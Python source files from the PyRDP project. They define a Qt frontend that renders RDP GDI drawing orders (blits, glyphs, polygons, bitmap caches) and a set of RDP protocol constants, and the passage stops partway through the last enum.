# Copyright (C) 2020 GoSecure Inc.
# Licensed under the GPLv3 or later.
#
"""
Types and methods proper to the MS-RDPEGDI extension.
"""

from pyrdp.parser.rdp.orders.parse import OrdersParser
from pyrdp.parser.rdp.orders.frontend import GdiFrontend
from .primary import PrimaryContext

__all__ = [OrdersParser, PrimaryContext, GdiFrontend]



#
# This file is part of the PyRDP project.
# Copyright (C) 2021-2023 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

import logging
import typing

from pyrdp.parser.rdp.orders import GdiFrontend
from pyrdp.parser.rdp.orders.common import Bounds
from pyrdp.parser.rdp.orders.frontend import BrushStyle, HatchStyle
from pyrdp.parser.rdp.orders.alternate import CreateOffscreenBitmap, SwitchSurface, CreateNineGridBitmap, \
    StreamBitmapFirst, StreamBitmapNext, GdiPlusFirst, GdiPlusNext, GdiPlusEnd, GdiPlusCacheFirst, \
    GdiPlusCacheNext, GdiPlusCacheEnd, FrameMarker
from pyrdp.parser.rdp.orders.secondary import CacheBitmapV1, CacheBitmapV2, CacheBitmapV3, CacheColorTable, \
    CacheGlyph, CacheBrush
from pyrdp.parser.rdp.orders.primary import DstBlt, PatBlt, ScrBlt, DrawNineGrid, MultiDrawNineGrid, \
    LineTo, OpaqueRect, SaveBitmap, MemBlt, Mem3Blt, MultiDstBlt, MultiPatBlt, MultiScrBlt, MultiOpaqueRect, \
    FastIndex, PolygonSc, PolygonCb, PolyLine, FastGlyph, EllipseSc, EllipseCb, GlyphIndex, Brush, \
    BACKMODE_TRANSPARENT

from pyrdp.ui import RDPBitmapToQtImage

from .cache import BitmapCache, BrushCache, PaletteCache, GlyphCache, GlyphEntry
from .raster import set_rop3, set_rop2

from PySide6.QtCore import Qt, QPoint
from PySide6.QtGui import QImage, QPainter, QColor, QPixmap, QBrush, QPen, QPolygon

from pyrdp.player.ImageHandler import ImageHandler

LOG = logging.getLogger(__name__)

SCREEN_BITMAP_SURFACE = 0xFFFF
BITMAPCACHE_SCREEN_ID = 0xFF
SUBSTITUTE_SURFACE = -1

# Opaque Rectangle Encoding Flags.
OPRECT_BOTTOM_ABSENT = 0x01
OPRECT_RIGHT_ABSENT = 0x02
OPRECT_TOP_ABSENT = 0x04
OPRECT_LEFT_ABSENT = 0x08

GLYPH_SPECIAL_PROCESSING = -32768
GLYPH_FRAGMENT_USE = 0xFE
GLYPH_FRAGMENT_ADD = 0xFF

# Defined in 2.2.2.2.1.1.2.13 (GlyphIndex)
SO_VERTICAL = 0x01
SO_HORIZONTAL = 0x02
SO_CHAR_INC_EQUAL_BM_BASE = 0x20


def rgb_to_qcolor(color: int):
    """Convert an RDP color (0xRRGGBB) to a QColor."""
    bpp = 16
    # TODO: check BPP from capabilities
    if bpp in [24, 32]:
        return QColor(color)
    if bpp == 16:
        t = color & 0x1F
        t = (t << 3) + t // 4
        b = min(t, 255)

        t = (color >> 5) & 0x3F
        t = (t << 2) + t // 4 // 2
        g = min(t, 255)

        t = (color >> 11) & 0x1F
        t = (t << 3) + t // 4
        r = min(t, 255)

    elif bpp == 15:
        pass
    elif bpp == 8:  # TODO: Support palettized mode.
        pass
    return QColor.fromRgb(r, g, b)


class GdiQtFrontend(GdiFrontend):
    """
    A Qt Frontend for GDI drawing operations.

    This acts as a straight adapter from GDI to Qt as much as
    possible, but GDI specific operations that are not supported by Qt
    are implemented here.

    Some of the methods are not implemented and will simply ignore the
    order:

        - NineGrid-related orders
        - StreamBitmap orders
        - GDI+ orders

    Note that `CacheBitmapV3` is only used in 32 bits-per-pixel which
    PyRDP currently does not support due to RDP6.0 compression not
    being implemented yet.

    If you have a replay which contains any unsupported or untested
    order, do not hesitate to share it with the project maintainers so
    that support can be added as required.

    (Make sure that the trace does not contain any sensitive information)
    """

    def __init__(self, imageHandler: ImageHandler):
        self.imageHandler = imageHandler
        self._warned = False

        # Initialize caches.
        self.bitmaps = BitmapCache()
        self.brushes = BrushCache()
        self.palettes = PaletteCache()
        self.glyphs = GlyphCache()

        self.bounds = None

        screen = self.imageHandler.screen
        fallback = QImage(self.imageHandler.screen.width(), self.imageHandler.screen.height(), QImage.Format_ARGB32_Premultiplied)
        fallback.fill(0)

        self.surfaces = {
            SCREEN_BITMAP_SURFACE: screen,
            SUBSTITUTE_SURFACE: fallback,
        }
        self.activeSurface = SCREEN_BITMAP_SURFACE

    @property
    def surface(self) -> QImage:
        """Get the currently active surface."""
        return self.surfaces[self.activeSurface]

    @property
    def screen(self) -> QImage:
        return self.surfaces[SCREEN_BITMAP_SURFACE]

    # Rendering Helpers.
    def _paint(self, dst: QImage):
        """Retrieve QPainter for the given surface."""
        p = QPainter(dst)
        p.setPen(Qt.NoPen)
        # Set the bounding rectangle if present.
        if self.bounds:
            x = self.bounds.left
            y = self.bounds.top
            w = self.bounds.right - x
            h = self.bounds.bottom - y

            p.setClipRect(x, y, w + 1, h + 1)
            p.setClipping(True)
        return p

    def _end(self, p: QPainter):
        p.end()

    def _brush(self, b: Brush, p: QPainter):
        """Configure the given brush."""
        brush = None

        if b.index is not None:  # This is a cached brush.
            brush = self.brushes.get(b.index)
        elif b.style == BrushStyle.PATTERN:
            pm = QPixmap.loadFromData(b.data, _fmt[b.bpp])
            brush = QBrush(pm)
        elif b.style == BrushStyle.HATCHED:
            brush = QBrush(_hs[b.hatch])
        else:
            brush = QBrush(_bs[b.style])

        p.setBrush(brush)
        p.setBrushOrigin(b.x, b.y)

    # Drawing API.
    def onBounds(self, bounds: Bounds):
        """Called on bounding rectangle updates."""
        self.bounds = bounds

    def dstBlt(self, state: DstBlt):
        """Destination-only blitting operation."""
        LOG.debug(state)
        p = self._paint(self.surface)
        set_rop3(state.rop, p)
        p.fillRect(state.x, state.y, state.w, state.h, Qt.SolidPattern)
        self._end(p)

    def multiDstBlt(self, state: MultiDstBlt):
        """Destination-only blitting operation."""
        LOG.debug(state)
        p = self._paint(self.surface)
        set_rop3(state.rop, p)

        for (x, y, w, h) in state.rectangles:
            p.fillRect(x, y, w, h, Qt.SolidPattern)
        self._end(p)

    def patBlt(self, state: PatBlt):
        LOG.debug(state)
        p = self._paint(self.surface)
        self._brush(state.brush, p)
        set_rop3(state.rop, p)

        p.brush().setColor(rgb_to_qcolor(state.fg))
        p.setBackground(QBrush(rgb_to_qcolor(state.bg)))

        p.drawRect(state.x, state.y, state.w, state.h)
        self._end(p)

    def multiPatBlt(self, state: MultiPatBlt):
        LOG.debug(state)
        p = self._paint(self.surface)
        self._brush(state.brush)
        set_rop3(state.rop, p)

        p.brush().setColor(rgb_to_qcolor(state.fg))
        p.setBackground(QBrush(rgb_to_qcolor(state.bg)))

        for (x, y, w, h) in state.rectangles:
            p.drawRect(x, y, w, h)
        self._end(p)

    def scrBlt(self, state: ScrBlt):
        LOG.debug(state)
        src = self.screen
        dst = self.surface
        if src == dst:  # Qt doesn't support drawing to the source surface
            src = dst.copy()

        p = self._paint(dst)
        set_rop3(state.bRop, p)

        p.drawImage(state.nLeftRect, state.nTopRect, src, state.nXSrc, state.nYSrc, state.nWidth, state.nHeight)
        self._end(p)

    def multiScrBlt(self, state: MultiScrBlt):
        LOG.debug(state)
        src = self.screen
        dst = self.surface
        if src == dst:  # Qt doesn't support drawing to the source surface
            src = dst.copy()

        p = self._paint(dst)
        set_rop3(state.bRop, p)

        p.drawImage(state.nLeftRect, state.nTopRect, src, state.nXSrc, state.nYSrc, state.nWidth, state.nHeight)

        # Doesn't seem to be necessary.
        # for (x, y, w, h) in state.rectangles:
        #     p.drawImage(x, y, src, state.nXSrc, state.nYSrc, w, h)
        self._end(p)

    def drawNineGrid(self, state: DrawNineGrid):
        LOG.debug(state)
        self._unimplemented()

    def multiDrawNineGrid(self, state: MultiDrawNineGrid):
        LOG.debug(state)
        self._unimplemented()

    def lineTo(self, state: LineTo):
        LOG.debug(state)
        p = self._paint(self.surface)
        set_rop2(state.rop2, p)
        p.setBackgroundMode(Qt.TransparentMode if state.bgMode == BACKMODE_TRANSPARENT else Qt.OpaqueMode)
        p.setBackground(QBrush(rgb_to_qcolor(state.bg)))
        p.setPen(QPen(rgb_to_qcolor(state.penColor)))

        p.drawLine(state.x0, state.y0, state.x1, state.y1)
        self._end(p)

    def opaqueRect(self, state: OpaqueRect):
        LOG.debug(state)
        p = self._paint(self.surface)
        p.fillRect(state.x, state.y, state.w, state.h, rgb_to_qcolor(state.color))
        self._end(p)

    def multiOpaqueRect(self, state: MultiOpaqueRect):
        LOG.debug(state)
        p = self._paint(self.surface)
        color = rgb_to_qcolor(state.color)

        for (x, y, w, h) in state.rectangles:
            p.fillRect(x, y, w, h, color)

        self._end(p)

    def saveBitmap(self, state: SaveBitmap):
        LOG.debug(state)
        self._unimplemented()

    def memBlt(self, state: MemBlt):
        LOG.debug(state)
        dst = self.surface
        p = self._paint(dst)
        set_rop3(state.rop, p)

        if state.cacheId == BITMAPCACHE_SCREEN_ID:
            # Use offscreen bitmap as a source.
            src = self.surfaces[state.cacheIndex]
            if src == dst:
                src = dst.copy()  # Can't paint to same surface.
        else:
            src, _ = self.bitmaps.get(state.cacheId, state.cacheIndex)

            if src is None:
                return  # Ignore cache misses.

        p.drawImage(state.left, state.top, src, state.xSrc, state.ySrc, state.width, state.height)
        self._end(p)

    def mem3Blt(self, state: Mem3Blt):
        LOG.debug(state)
        if state.cacheId == BITMAPCACHE_SCREEN_ID:
            # Use offscreen bitmap as a source.
            src = self.surfaces[state.cacheIndex]
        else:
            src, _ = self.bitmaps.get(state.cacheId, state.cacheIndex)

            if src is None:
                return  # Ignore cache misses.

        p = self._paint(self.surface)
        self._brush(state.brush, p)
        set_rop3(state.rop, p)
        p.brush().setColor(rgb_to_qcolor(state.fg))
        p.setBackground(QBrush(rgb_to_qcolor(state.bg)))

        p.drawImage(state.left, state.top, src, state.xSrc, state.ySrc, state.width, state.height)
        self._end(p)

    def fastIndex(self, state: FastIndex):
        LOG.debug(state)
        self._process_glyph(GlyphContext(state), state.data)

    def polygonSc(self, state: PolygonSc):
        LOG.debug(state)
        p = self._paint(self.surface)
        p.setBrush(QBrush(rgb_to_qcolor(state.brushColor)))
        set_rop2(state.rop2, p)

        polygon = QPolygon()
        polygon.append(QPoint(state.x0, state.y0))
        for (x, y) in state.points:
            polygon.append(QPoint(x, y))

        p.drawPolygon(polygon, _fill[state.fillMode])
        self._end(p)

    def polygonCb(self, state: PolygonCb):
        LOG.debug(state)
        p = self._paint(self.surface)
        self._brush(state.brush)
        p.brush().setColor(rgb_to_qcolor(state.fg))
        p.setBackground(QBrush(rgb_to_qcolor(state.bg)))
        set_rop2(state.rop2, p)

        # Handle background mode.
        if state.brush.style in [BrushStyle.PATTERN, BrushStyle.HATCHED]:
            p.setBackgroundMode(Qt.TransparentMode if state.bgMode == BACKMODE_TRANSPARENT else Qt.OpaqueMode)

        polygon = QPolygon()
        polygon.append(QPoint(state.x0, state.y0))
        for (x, y) in state.points:
            polygon.append(QPoint(x, y))

        p.drawPolygon(polygon, _fill[state.fillMode])
        self._end(p)

    def polyLine(self, state: PolyLine):
        LOG.debug(state)
        p = self._paint(self.surface)
        p.setPen(QPen(rgb_to_qcolor(state.penColor)))
        set_rop2(state.rop2, p)

        polygon = QPolygon()
        polygon.append(QPoint(state.x0, state.y0))
        for (x, y) in state.points:
            polygon.append(QPoint(x, y))

        p.drawPolyline(polygon)
        self._end(p)

    def fastGlyph(self, state: FastGlyph):
        LOG.debug(state)
        if state.glyph:
            glyph = GlyphEntry(state.glyph)
            self.glyphs.add(state.cacheId, state.cacheIndex, glyph)
        else:
            glyph = self.glyphs.get(state.cacheId, state.cacheIndex)

        if not glyph:
            return  # Ignore unknown glyph.

        self._process_glyph(GlyphContext(state), bytes([state.cacheIndex, 0]))

    def ellipseSc(self, state: EllipseSc):
        LOG.debug(state)
        p = self._paint(self.surface)
        set_rop2(state.rop2, p)
        p.setBrush(QBrush(rgb_to_qcolor(state.brushColor)))

        if not state.fillMode:
            # This probably doesn't have the expected behavior.
            p.setBackgroundMode(Qt.TransparentMode)

        w = state.right - state.left
        h = state.bottom - state.top
        p.drawEllipse(state.left, state.top, w, h)
        self._end(p)

    def ellipseCb(self, state: EllipseCb):
        LOG.debug(state)
        p = self._paint(self.surface)
        self._brush(state.brush)
        p.brush().setColor(rgb_to_qcolor(state.fg))
        p.setBackground(QBrush(rgb_to_qcolor(state.bg)))
        set_rop2(state.rop2, p)

        if not state.fillMode:
            # This probably doesn't have the expected behavior.
            p.setBackgroundMode(Qt.TransparentMode)

        w = state.right - state.left
        h = state.bottom - state.top
        p.drawEllipse(state.left, state.top, w, h)

    def glyphIndex(self, state: GlyphIndex):
        LOG.debug(state)
        self._process_glyph(GlyphContext(state), state.data)

    # Secondary Handlers
    def cacheBitmapV1(self, state: CacheBitmapV1):
        LOG.debug(state)
        bmp, buf = RDPBitmapToQtImage(state.width, state.height,  state.bpp, True, state.data)
        self.bitmaps.add(state.cacheId, state.cacheIndex, bmp, buf)

    def cacheBitmapV2(self, state: CacheBitmapV2):
        LOG.debug(state)
        bmp, buf = RDPBitmapToQtImage(state.width, state.height,  state.bpp, True, state.data)
        self.bitmaps.add(state.cacheId, state.cacheIndex, bmp, buf)

    def cacheBitmapV3(self, state: CacheBitmapV3):
        LOG.debug(state)
        bmp, buf = RDPBitmapToQtImage(state.width, state.height,  state.bpp, True, state.data)
        self.bitmaps.add(state.cacheId, state.cacheIndex, bmp, buf)

    def cacheColorTable(self, state: CacheColorTable):
        LOG.debug(state)
        self.palettes.add(state.cacheIndex, state.colors)

    def cacheGlyph(self, state: CacheGlyph):
        LOG.debug(state)
        for g in state.glyphs:
            glyph = GlyphEntry(g)
            self.glyphs.add(state.cacheId, g.cacheIndex, glyph)

    def cacheBrush(self, state: CacheBrush):  # FIXME: Maybe should not be expanding brush pixels too?
        LOG.debug(state)
        # There's probably a more efficient than using QImage
        i = QImage(state.data, state.width, state.height, _fmt[state.bpp])
        pm = QPixmap.fromImageInPlace(i)
        self.brushes.add(state.cacheIndex, QBrush(pm))

    # Alternate Secondary Handlers
    def frameMarker(self, state: FrameMarker):
        LOG.debug(state)
        if state.action == 0x01:  # END
            # self.imageHandler.notifyImage(0, 0, self.screen, self.imageHandler.width(), self.imageHandler.height())
            self.imageHandler.update()

    def createOffscreenBitmap(self, state: CreateOffscreenBitmap):
        LOG.debug(state)
        bmp = QImage(state.cx, state.cy, QImage.Format_ARGB32_Premultiplied)
        bmp.fill(0)

        self.surfaces[state.id] = bmp

        for d in state.delete:
            if d in self.surfaces:
                del self.surfaces[d]

    def switchSurface(self, state: SwitchSurface):
        LOG.debug(state)
        if state.id not in self.surfaces:
            # Appendix A - <5> Section 2.2.2.2.1.3.3
            LOG.warning('Request for uninitialized surface: %d', state.id)
            self.activeSurface = SUBSTITUTE_SURFACE
            return
        self.activeSurface = state.id

    def createNineGridBitmap(self, state: CreateNineGridBitmap):
        LOG.debug(state)
        self._unimplemented()

    def streamBitmapFirst(self, state: StreamBitmapFirst):
        LOG.debug(state)
        self._unimplemented()

    def streamBitmapNext(self, state: StreamBitmapNext):
        LOG.debug(state)
        self._unimplemented()

    def drawGdiPlusFirst(self, state: GdiPlusFirst):
        LOG.debug(state)
        self._unimplemented()

    def drawGdiPlusNext(self, state: GdiPlusNext):
        LOG.debug(state)
        self._unimplemented()

    def drawGdiPlusEnd(self, state: GdiPlusEnd):
        LOG.debug(state)
        self._unimplemented()

    def drawGdiPlusCacheFirst(self, state: GdiPlusCacheFirst):
        LOG.debug(state)
        self._unimplemented()

    def drawGdiPlusCacheNext(self, state: GdiPlusCacheNext):
        LOG.debug(state)
        self._unimplemented()

    def drawGdiPlusCacheEnd(self, state: GdiPlusCacheEnd):
        LOG.debug(state)
        self._unimplemented()

    def _process_glyph(self, ctx: 'GlyphContext', data: bytes):
        """Process glyph rendering instructions."""
        # 2.2.2.2.1.1.2.14
        p = self._paint(self.surface)

        cid = ctx.cacheId

        i = 0
        while i < len(data):
            instr = data[i]
            i += 1

            if instr == GLYPH_FRAGMENT_USE:
                fid = data[i]
                i += 1
                fragment = self.glyphs.getFragment(cid, fid)
                n = 0
                size = len(fragment)

                while n < size:
                    idx = fragment[n]
                    n += 1

                    glyph = self.glyphs.get(cid, idx)

                    n = ctx.offset(n, fragment)
                    ctx.draw(glyph, p)

                # Skip for now, seems to always be 0.
                if ctx.ulCharInc == 0 and not (ctx.flAccel & SO_CHAR_INC_EQUAL_BM_BASE):
                    i += 2 if data[i] == 0x80 else 1

            elif instr == GLYPH_FRAGMENT_ADD:
                fid = data[i]
                size = data[i + 1]
                fragment = data[(i - size - 1):size]
                i += 2
                self.glyphs.addFragment(cid, fid, fragment)
            else:
                glyph = self.glyphs.get(cid, instr)
                i = ctx.offset(i, data)
                ctx.draw(glyph, p)
        self._end(p)

    def _unimplemented(self):
        if not self._warned:
            LOG.warning('One or more unimplemented drawing orders called! Expect lossy rendering.')
            self._warned = True


class GlyphContext:
    """
    Glyph processing context.

    This is an internal class to store mutable glyph rendering state
    during the rendering operations.
    """

    def __init__(self,  source: typing.Union[GlyphIndex, FastIndex, FastGlyph]):
        self.cacheId = source.cacheId

        self.bg = source.bg
        self.fg = source.fg

        self.opLeft = source.opLeft
        self.opTop = source.opTop
        self.opRight = source.opRight
        self.opBottom = source.opBottom

        self.bkLeft = source.bkLeft
        self.bkTop = source.bkTop
        self.bkRight = source.bkRight
        self.bkBottom = source.bkBottom

        self.x = source.x
        self.y = source.y

        self.flAccel = source.flAccel
        self.ulCharInc = source.ulCharInc
        self.fOpRedundant = False

        if not isinstance(source, GlyphIndex):
            if self.opBottom == GLYPH_SPECIAL_PROCESSING:
                flags = self.opTop & 0x0F
                if flags & OPRECT_BOTTOM_ABSENT:
                    self.opBottom = source.bkBottom
                elif flags & OPRECT_RIGHT_ABSENT:
                    self.opRight = source.bkRight
                elif flags & OPRECT_TOP_ABSENT:
                    self.opTop = source.bkTop
                elif flags & OPRECT_LEFT_ABSENT:
                    self.opLeft = source.bkLeft

            if self.opLeft == 0:
                self.opLeft = source.bkLeft
            if self.opRight == 0:
                self.opRight == source.bkRight

            # Adjust x and y
            if self.x == GLYPH_SPECIAL_PROCESSING:
                self.x = source.bkLeft
            if self.y == GLYPH_SPECIAL_PROCESSING:
                self.y = source.bkTop
        else:
            self.fOpRedundant = source.fOpRedundant

        self.bkWidth = source.bkRight - source.bkLeft + 1 if source.bkRight > source.bkLeft else 0
        self.bkHeight = source.bkBottom - source.bkTop + 1 if source.bkBottom > source.bkTop else 0

        self.opWidth = self.opRight - self.opLeft + 1 if self.opRight > self.opLeft else 0
        self.opHeight = self.opBottom - self.opTop + 1 if self.opBottom > self.opTop else 0

    def offset(self, index: int, data: bytes) -> int:
        """Read the offset of the next glyph and return the new instruction index."""
        if self.ulCharInc == 0 and not (self.flAccel & SO_CHAR_INC_EQUAL_BM_BASE):
            offset = data[index]
            index += 1
            if offset & 0x80:  # 2 byte offset.
                offset = data[index]
                offset |= data[index + 1]
                index += 2
            if self.flAccel & SO_VERTICAL:
                self.y += offset
            if self.flAccel & SO_HORIZONTAL:
                self.x += offset
        return index

    def draw(self, glyph: GlyphEntry, p: QPainter):
        """Render a glyph using the given painter."""
        # Adjust the glyph coordinates to center it on origin
        x = self.x + glyph.x
        y = self.y + glyph.y

        if not self.fOpRedundant:
            p.fillRect(x, y, glyph.w, glyph.h, rgb_to_qcolor(self.fg))

        p.setBrush(QBrush(rgb_to_qcolor(self.bg), glyph.bitmap))
        p.setBrushOrigin(x, y)
        p.drawRect(x, y, glyph.w, glyph.h)

        if self.flAccel & SO_CHAR_INC_EQUAL_BM_BASE:
            self.x += glyph.w


# Map brush styles to Qt brush style
_bs = {
    BrushStyle.SOLID: Qt.SolidPattern,
    BrushStyle.NULL: Qt.NoBrush,
    BrushStyle.HATCHED: None,  # Must lookup in _hs.
    BrushStyle.PATTERN: Qt.TexturePattern,
}

_hs = {
    HatchStyle.HORIZONTAL: Qt.HorPattern,
    HatchStyle.VERTICAL: Qt.VerPattern,
    HatchStyle.FDIAGONAL: Qt.FDiagPattern,
    HatchStyle.BDIAGNOAL: Qt.BDiagPattern,
    HatchStyle.CROSS: Qt.CrossPattern,
    HatchStyle.DIAGCROSS: Qt.DiagCrossPattern,
}

# Pixel format lookup table.
_fmt = {
    1: QImage.Format_Mono,
    8: QImage.Format_Grayscale8,
    16: QImage.Format_RGB16,
    24: QImage.Format_RGB888,
    32: QImage.Format_RGB32,
}

# Polygon fill mode lookup table
_fill = [
    None,  # 0x00
    Qt.OddEvenFill,  # 0x01: ALTERNATE
    Qt.WindingFill   # 0x02: WINDING

]



#
# This file is part of the PyRDP project.
# Copyright (C) 2018-2022 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

# Disable line-too-long lints.
# flake8: noqa

from enum import IntEnum, IntFlag


class ClientInfoFlags:
    """
    Flags for the RDPClientInfoPDU flags field
    """
    INFO_MOUSE = 0x00000001
    INFO_DISABLECTRLALTDEL = 0x00000002
    INFO_AUTOLOGON = 0x00000008
    INFO_UNICODE = 0x00000010
    INFO_MAXIMIZESHELL = 0x00000020
    INFO_LOGONNOTIFY = 0x00000040
    INFO_COMPRESSION = 0x00000080
    INFO_ENABLEWINDOWSKEY = 0x00000100
    INFO_REMOTECONSOLEAUDIO = 0x00002000
    INFO_FORCE_ENCRYPTED_CS_PDU = 0x00004000
    INFO_RAIL = 0x00008000
    INFO_LOGONERRORS = 0x00010000
    INFO_MOUSE_HAS_WHEEL = 0x00020000
    INFO_PASSWORD_IS_SC_PIN = 0x00040000
    INFO_NOAUDIOPLAYBACK = 0x00080000
    INFO_USING_SAVED_CREDS = 0x00100000
    INFO_AUDIOCAPTURE = 0x00200000
    INFO_VIDEO_DISABLE = 0x00400000
    INFO_CompressionTypeMask = 0x00001E00


class SecurityFlags:
    SEC_EXCHANGE_PKT = 0x0001
    SEC_TRANSPORT_REQ = 0x0002
    SEC_TRANSPORT_RSP = 0x0004
    SEC_ENCRYPT = 0x0008
    SEC_RESET_SEQNO = 0x0010
    SEC_IGNORE_SEQNO = 0x0020
    SEC_INFO_PKT = 0x0040
    SEC_LICENSE_PKT = 0x0080
    SEC_LICENSE_ENCRYPT_CS = 0x0100
    SEC_LICENSE_ENCRYPT_SC = 0x0200
    SEC_REDIRECTION_PKT = 0x0400
    SEC_SECURE_CHECKSUM = 0x0800
    SEC_AUTODETECT_REQ = 0x1000
    SEC_AUTODETECT_RSP = 0x2000
    SEC_HEARTBEAT = 0x4000
    SEC_FLAGSHI_VALID = 0x8000


class SecurityHeaderType(IntEnum):
    NONE = 0
    BASIC = 1
    SIGNED = 2
    FIPS = 3

    # Header type used for Client Info and Licensing PDUs if no encryption is used
    DEFAULT = 1


class FastPathSecurityFlags:
    FASTPATH_OUTPUT_SECURE_CHECKSUM = 0x40
    FASTPATH_OUTPUT_ENCRYPTED = 0x80


class FastPathInputType(IntEnum):
    FASTPATH_INPUT_EVENT_SCANCODE = 0
    FASTPATH_INPUT_EVENT_MOUSE = 1
    FASTPATH_INPUT_EVENT_MOUSEX = 2
    FASTPATH_INPUT_EVENT_SYNC = 3
    FASTPATH_INPUT_EVENT_UNICODE = 4
    FASTPATH_INPUT_EVENT_QOE_TIMESTAMP = 6


class FastPathOutputType(IntEnum):
    """
    https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/a1c4caa8-00ed-45bb-a06e-5177473766d3
    """
    FASTPATH_UPDATETYPE_ORDERS = 0
    FASTPATH_UPDATETYPE_BITMAP = 1
    FASTPATH_UPDATETYPE_PALETTE = 2
    FASTPATH_UPDATETYPE_SYNCHRONIZE = 3
    FASTPATH_UPDATETYPE_SURFCMDS = 4
    FASTPATH_UPDATETYPE_PTR_NULL = 5
    FASTPATH_UPDATETYPE_PTR_DEFAULT = 6
    FASTPATH_UPDATETYPE_PTR_POSITION = 8
    FASTPATH_UPDATETYPE_COLOR = 9
    FASTPATH_UPDATETYPE_CACHED = 10
    FASTPATH_UPDATETYPE_POINTER = 11

    @staticmethod
    def getText(updateType: 'FastPathOutputType'):
        MESSAGES = {
            FastPathOutputType.FASTPATH_UPDATETYPE_ORDERS: 'ORDERS',
            FastPathOutputType.FASTPATH_UPDATETYPE_BITMAP: 'BITMAP',
            FastPathOutputType.FASTPATH_UPDATETYPE_PALETTE: 'PALETTE',
            FastPathOutputType.FASTPATH_UPDATETYPE_SYNCHRONIZE: 'SYNCHRONIZE',
            FastPathOutputType.FASTPATH_UPDATETYPE_SURFCMDS: 'SURFCMDS',
            FastPathOutputType.FASTPATH_UPDATETYPE_PTR_NULL: 'PTR_NULL',
            FastPathOutputType.FASTPATH_UPDATETYPE_PTR_DEFAULT: 'PTR_DEFAULT',
            FastPathOutputType.FASTPATH_UPDATETYPE_PTR_POSITION: 'PTR_POSITION',
            FastPathOutputType.FASTPATH_UPDATETYPE_COLOR: 'COLOR',
            FastPathOutputType.FASTPATH_UPDATETYPE_CACHED: 'CACHED',
            FastPathOutputType.FASTPATH_UPDATETYPE_POINTER: 'POINTER',
        }
        return MESSAGES.get(updateType)


class FastPathOutputCompressionType(IntEnum):
    """
    https://msdn.microsoft.com/en-us/library/cc240622.aspx
    """
    FASTPATH_OUTPUT_COMPRESSION_USED = 0x2


class FIPSVersion(IntEnum):
    TSFIPS_VERSION1 = 1


class LicensingPDUType(IntEnum):
    LICENSE_REQUEST = 0x01
    PLATFORM_CHALLENGE = 0x02
    NEW_LICENSE = 0x03
    UPGRADE_LICENSE = 0x04
    LICENSE_INFO = 0x12
    NEW_LICENSE_REQUEST = 0x13
    PLATFORM_CHALLENGE_RESPONSE = 0x15
    ERROR_ALERT = 0xFF


class LicenseBinaryBlobType(IntEnum):
    """
    License blob data type
    See http://msdn.microsoft.com/en-us/library/cc240481.aspx
    """
    BB_ANY_BLOB = 0x0000
    BB_DATA_BLOB = 0x0001
    BB_RANDOM_BLOB = 0x0002
    BB_CERTIFICATE_BLOB = 0x0003
    BB_ERROR_BLOB = 0x0004
    BB_ENCRYPTED_DATA_BLOB = 0x0009
    BB_KEY_EXCHG_ALG_BLOB = 0x000D
    BB_SCOPE_BLOB = 0x000E
    BB_CLIENT_USER_NAME_BLOB = 0x000F
    BB_CLIENT_MACHINE_NAME_BLOB = 0x0010


class LicenseErrorCode(IntEnum):
    """
    @summary: License error message code
    @see: http://msdn.microsoft.com/en-us/library/cc240482.aspx
    """
    ERR_INVALID_SERVER_CERTIFICATE = 0x00000001
    ERR_NO_LICENSE = 0x00000002
    ERR_INVALID_SCOPE = 0x00000004
    ERR_NO_LICENSE_SERVER = 0x00000006
    STATUS_VALID_CLIENT = 0x00000007
    ERR_INVALID_CLIENT = 0x00000008
    ERR_INVALID_PRODUCTID = 0x0000000B
    ERR_INVALID_MESSAGE_LEN = 0x0000000C
    ERR_INVALID_MAC = 0x00000003


class RDPStateTransition(IntEnum):
    """
    http://msdn.microsoft.com/en-us/library/cc240482.aspx
    """
    ST_TOTAL_ABORT = 0x00000001
    ST_NO_TRANSITION = 0x00000002
    ST_RESET_PHASE_TO_START = 0x00000003
    ST_RESEND_LAST_MESSAGE = 0x00000004


class SlowPathPDUType(IntEnum):
    """
    http://msdn.microsoft.com/en-us/library/cc240576.aspx
    """
    DEMAND_ACTIVE_PDU = 0x1
    CONFIRM_ACTIVE_PDU = 0x3
    DEACTIVATE_ALL_PDU = 0x6
    DATA_PDU = 0x7
    SERVER_REDIR_PKT_PDU = 0xA


class SlowPathUpdateType(IntEnum):
    """
    https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/bd3c4df4-87b9-43dd-88cb-ce5b24698e19
    """
    SLOWPATH_UPDATETYPE_ORDERS = 0
    SLOWPATH_UPDATETYPE_BITMAP = 1
    SLOWPATH_UPDATETYPE_PALETTE = 2
    SLOWPATH_UPDATETYPE_SYNCHRONIZE = 3


class SlowPathDataType(IntEnum):
    """
    Slow-path data PDU types.
    http://msdn.microsoft.com/en-us/library/cc240577.aspx
    """
    PDUTYPE2_UPDATE = 0x02
    PDUTYPE2_CONTROL = 0x14
    PDUTYPE2_POINTER = 0x1B
    PDUTYPE2_INPUT = 0x1C
    PDUTYPE2_SYNCHRONIZE = 0x1F
    PDUTYPE2_REFRESH_RECT = 0x21
    PDUTYPE2_PLAY_SOUND = 0x22
    PDUTYPE2_SUPPRESS_OUTPUT = 0x23
    PDUTYPE2_SHUTDOWN_REQUEST = 0x24
    PDUTYPE2_SHUTDOWN_DENIED = 0x25
    PDUTYPE2_SAVE_SESSION_INFO = 0x26
    PDUTYPE2_FONTLIST = 0x27
    PDUTYPE2_FONTMAP = 0x28
    PDUTYPE2_SET_KEYBOARD_INDICATORS = 0x29
    PDUTYPE2_BITMAPCACHE_PERSISTENT_LIST = 0x2B
    PDUTYPE2_BITMAPCACHE_ERROR_PDU = 0x2C
    PDUTYPE2_SET_KEYBOARD_IME_STATUS = 0x2D
    PDUTYPE2_OFFSCRCACHE_ERROR_PDU = 0x2E
    PDUTYPE2_SET_ERROR_INFO_PDU = 0x2F
    PDUTYPE2_DRAWNINEGRID_ERROR_PDU = 0x30
    PDUTYPE2_DRAWGDIPLUS_ERROR_PDU = 0x31
    PDUTYPE2_ARC_STATUS_PDU = 0x32
    PDUTYPE2_STATUS_INFO_PDU = 0x36
    PDUTYPE2_MONITOR_LAYOUT_PDU = 0x37


class ConnectionDataType(IntEnum):
    SERVER_CORE = 0x0C01
    SERVER_SECURITY = 0x0C02
    SERVER_NETWORK = 0x0C03
    CLIENT_CORE = 0xC001
    CLIENT_SECURITY = 0xC002
    CLIENT_NETWORK = 0xC003
    CLIENT_CLUSTER = 0xC004
    CLIENT_MONITOR = 0xC005


class RDPVersion(IntEnum):
    RDP4 = 0x80001
